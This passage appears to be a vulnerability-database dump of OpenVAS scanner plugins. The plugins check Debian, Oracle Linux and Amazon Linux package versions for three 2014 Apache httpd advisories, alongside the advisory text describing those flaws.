indefinitely, leading to denial\nof service.", "modified": "2019-03-19T00:00:00", "published": "2014-07-24T00:00:00", "id": "OPENVAS:1361412562310702989", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702989", "type": "openvas", "title": "Debian Security Advisory DSA 2989-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2989.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2989-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702989\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_name(\"Debian Security Advisory DSA 2989-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-24 00:00:00 +0200 (Thu, 24 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2989.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226\nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231\nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-27T10:48:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118 \nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226 \nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231 \nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.", "modified": "2017-07-12T00:00:00", "published": "2014-07-24T00:00:00", "id": "OPENVAS:702989", "href": "http://plugins.openvas.org/nasl.php?oid=702989", "type": "openvas", "title": "Debian Security Advisory DSA 2989-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2989.nasl 6692 2017-07-12 09:57:43Z teissa $\n# Auto-generated from advisory DSA 2989-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"apache2 on Debian Linux\";\ntag_insight = \"The Apache Software Foundation's goal is to build a secure, efficient and\nextensible HTTP server as standards-compliant open source software. The\nresult has long been the number one web server on the Internet.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\";\ntag_summary = \"Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118 \nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226 \nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231 \nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702989);\n script_version(\"$Revision: 6692 $\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_name(\"Debian Security Advisory DSA 2989-1 (apache2 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-07-24 00:00:00 +0200 (Thu, 24 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2989.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "Oracle Linux Local Security Checks ELSA-2014-0920", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123366", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-0920", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0920.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123366\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:02:50 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0920\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0920 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0920\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0920.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:01:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120104", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-389)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120104\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:31 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-389)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Apache HTTP server. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd24 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-389.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"mod24_proxy_html\", rpm:\"mod24_proxy_html~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24\", rpm:\"httpd24~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24-debuginfo\", rpm:\"httpd24-debuginfo~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod24_ldap\", rpm:\"mod24_ldap~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24-tools\", rpm:\"httpd24-tools~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod24_ssl\", rpm:\"mod24_ssl~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24-devel\", rpm:\"httpd24-devel~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd24-manual\", rpm:\"httpd24-manual~2.4.10~1.59.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], 